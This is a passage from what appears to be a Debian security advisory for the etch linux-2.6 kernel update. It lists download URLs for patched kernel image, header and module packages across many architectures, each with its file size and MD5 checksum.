http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23531908 3cd9327777e15186fcc3149852e73290\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 3027958 b9764577f6da5b8233db177295abd20f\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 16820986 eb574728014e9904a8b17b79d943f478\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 272278 ace4647a9cab44eba24967ea905ec511\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3357354 4a27ec48575670343f6849f073bf3fdb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 15261092 cbc252d19e9c5d54d05df350e3982d07\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 271366 1ff138c5b3b035aa0e00e01f9c4f0191\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3334544 deda30b57daf3beddb8f5761e1437c05\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3191322 1d05ad81472b0dafdfe1df5d780399fb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54220 4ecdd29baeeafc951bab081dda4e12ef\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 15272912 76bb3fe952642ad6b49ecd037b3e517d\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_amd64.deb\n Size/MD5 checksum: 5961148 cf3882acfa9f901fe84967a9593ecc18\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 1651376 bf5f3e895995733fa3083c9a07e39ea5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 271766 be91f9c886c16307775a5638cebd80c2\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54176 a22f888eb52a941b6c1eeb2bf4bccb78\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54196 71891fefd6ee2382962b8756df128b4a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3167972 4ce30d9f1fad078702baaa7834775f69\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 272054 e6c044359f237eab561d4c2a65e13f70\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 1682878 0a59c60af64f405bf651dd07ad5de0f4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 16859630 89749a4df4d633b398874b93ea578657\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54190 fe4b179dfd4c055d33503ba23bb136fb\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 203914 3854a7aceff5e5b08d7da9d9c8473eb2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 7566184 3251d12c0787ee663d41b6626fe5a19f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 7924654 72f101e8ff6000295d9a8145784225a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 239342 268018e4ccd46f7e810a47b39dc79f5b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 8871080 f9f89ad15430fa3ce924cabc61c059a2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 4587380 368ad6bded347af3ecf166a638423a87\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 54270 ea205cdff5f7c47808274f0742cb6601\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 3410570 4cfed14130d8e6ae01e29f43371fd267\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 54224 296297dda91d48b22b5c0792a512a9e2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 234034 756b3be7a0e806fd552088567eebf9b9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 5009710 65d72981b3071d9beb5702f747c36ee5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 233278 6ae2de0c4b0a4445ac244a0c18ffb81c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 199026 a77225b0ad44d3b76b1a713c561a362f\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 197138 d3fc247a0b6c6529c6b83f7e15199b5c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 195994 612e8e99ccd7513b0624aef50d8eb66e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 54200 437f1bd9f5228bb914af3031fd6655cc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 11804482 b24d71ea0c2766ba00365b15f5e24541\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 11399062 5723ae1069220e3b8d4907fbdf5ac10a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 10549640 3e964c1beb33196c39acec315b9c5804\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 198038 5764e6e1f0a379da2f67ab9f451d2c62\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 3021484 0616fe9a6b6a92e626d474f09a10638d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 196868 3b9dc88a935313ea464a08ad56196895\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 54230 d57f3c556d2ca6112ccbc0b627dcf83c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 10996980 19dddbbb86a828ca3ab0898ef8c8b0cf\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 279858 24e43546a522be29a5566c59950bb32f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 272272 163871c79fe7cc6f242343ae4b5e36ca\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 278466 dbe60de8028eed33bda3bd2021ccaa5f\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_i386.deb\n Size/MD5 checksum: 5504184 60937dfa6ebd60e8535ff15e4af6af0b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3170866 bd437b396223ac6fa6e995edb3964191\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54182 7374df882c4606c00b4d86bbfb0abcb0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3148682 5821e91313f3b4255fc349ed8506822b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16336816 d0d42ed775b040ea58b57a982f38b68d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16376288 5c199f320eb16c86be18b8d2e32c6415\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6_i386.deb\n Size/MD5 checksum: 25587656 f5942271087e736327ca834f0397a632\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3168052 e3bfd24b076d214cb6d33fc207f4beae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16404928 dcdc1f64db1ee1ea8676d8bfebe0cde5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3054444 9e19e9507845ddffdafe16c71a745a6c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 280326 764e6f2292876d3265432d3ed42841aa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 1326908 ad01885eb378b5bbc95e91940ba6528f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16467454 75761deb2f7ca6f579ea7b1d9f30bb43\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 282906 dd1c9ddc9e4b1a7a5ba707e4be0de779\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 279142 c9b278c0c863300b40e2ac56a9e57a54\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 280466 0adad9f9667eeb68e207c9b0c4a526f0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 272538 f47880728eb7eab49e58cacb82eae4f4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16837250 2d666f0d8999a31ad7384425939c475e\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54188 5063065bf61305f25ce2f0241bac53d5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16507156 0c629636b5c88deccae2b8f6bc4c0daf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16190498 5f26aa57b5f7d967dc9ae911134a9436\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54250 c6cc42868bc8e8c3a553708afcfdda83\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54192 dfc36804c4a878bd2e0568fc9df5972c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 272804 4e2db74286b34fef4bd99c654474eec7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 1299784 12eb6454b487ec3ffb3966c6b8597be6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 14290158 9423480b571bf67e17dd61f03d476e7f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 14279510 8d295d68339c7b23dd1a4fe3875098ae\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 3082048 dd4987af955b7af5bb0802afd37a38ec\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 28181788 c8ad6f07b25695277fd31940249fa717\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 54222 2e2917766865280fb807bce867e49e75\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 255700 2be8b8d91fa1cc8674d43ad6348f8fcc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 255646 40c255dd1a9491e28b61afa66c2062cb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 28013816 a7da365f87b7447cfa45e3e8f77ee413\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 54204 db7b8e3a94e5150700f75c80067f1e23\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 15678050 e86dbf740ac392529c18f1331e5f4ca2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 15653094 6fcd2afaec51e20c759f97956ad6deb5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 154384 c7d61cfea6e5162f26cab5a536d624c3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 187446 409a5fb466e0b56793fb5751ef8d2f37\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 54226 e3f3cece2fe1c52ab6f096b9acc9322e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 3413968 4937a4fed9815d21f3dde1556a1f03b2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 9075882 ef1a7fec0b442b53e0effb99b45ae553\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 163312 d47154e8a5858ac244d8964265aed5d3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 167140 2f6330c7fbf831496d241de7afbfe5dc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 187182 365cc18336f0028d5c61f7e36872dbaa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 8309624 9ced8ea53c844299ee4849381c3fb60f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 6125718 0d0162b98625a15c553598980d5e8f45\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 54280 16bef3ba6934982b845207616d50004b\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 16402774 000923a8f193ab5c87d7233553faa7b0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 245876 80b2eceadb0647df12bfbf28e8888656\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 17016908 0c7d49840f5aab6673233ccba0aa817d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 229544 17e19dff17d07c8a86b2b4619627458c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 15157736 dc163b2b90e72466217578571c93550e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 18349702 ffc686ae0dd4e89bd582499038847d92\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_powerpc.deb\n Size/MD5 checksum: 3366920 38e292c789864c61f4ba436c49bda658\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 16969850 05e77a41c6eb4a53d488bb3942f71a45\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 54210 008d62a0a7213fec41db8d6a67cc6407\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 16626712 e279a0593f97bb0e68864b14180ed332\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 3414766 07044ab533e3d329467896746182d3ff\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 253518 8a4221c90ebb86af18a3f116b2c9af80\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 54258 639108e49a1731d8064e581896e60ec3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 253484 691581f01279f1e08092759652103360\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 252244 16a63d2fc927903b51a3d57bacea7ed8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 253016 18a4ddf5d9109921f9ed67f899e92ca4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 252742 aa92fe8c1a292465d4c11686e2c0dc03\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 18294114 d74c3e627fe5c85e457972d235eb461c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 3392500 5f0fe6ea67e0187084b57379a4d235e3\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 1439074 e91f5e34f5393a17e1049c74d3ab4ddd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 2966244 e69cdbdf36efbb3e939e1e13acfd8a44\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 5620216 fe25a15c42d4eb5764d672a654c19067\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 2943246 833916a36215375f954230c64b5f79ce\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 5402446 cdddeaf8d4a250048d3d2afa244d2cd2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 54226 2296055efbd2a706fc44eebd2d50487c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 144810 024fa002bbe2e57a122f46f866739f66\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 143520 7cb0b94f4140919e1a985a1d525a9125\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 54200 1c16211c3cf03f335ec4dbbaed090857\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 5661724 84651e2bbc564a36d1ac0e65ab910dae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 143926 e6e15f966332bad3dcbbfaae0171c030\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 6411478 fb5619337245170a85cc61b5e9adf72a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 10693224 cd6a0ea78630ff737e96097c7b184a87\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 54210 979d148dca3dfea639cc1a812be72bd3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 3168314 09434cb6ab51eb601f920f6e2f0f1c02\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 165412 38f1c19c6f5e31aaae71dadbe4e757dc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 10647766 7c92870e968431b17c88e37f9fcda363\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 10391668 d3d87df04d14df510ff8ae6e5fdf4324\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 196126 66c35e907e5c03f640c41edccb3aa58e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 54236 600f2d0a3982da0b086f7e25c28f2f4f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 194390 ddb26e2649458cf19ec67fa4036b75ce\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 3190576 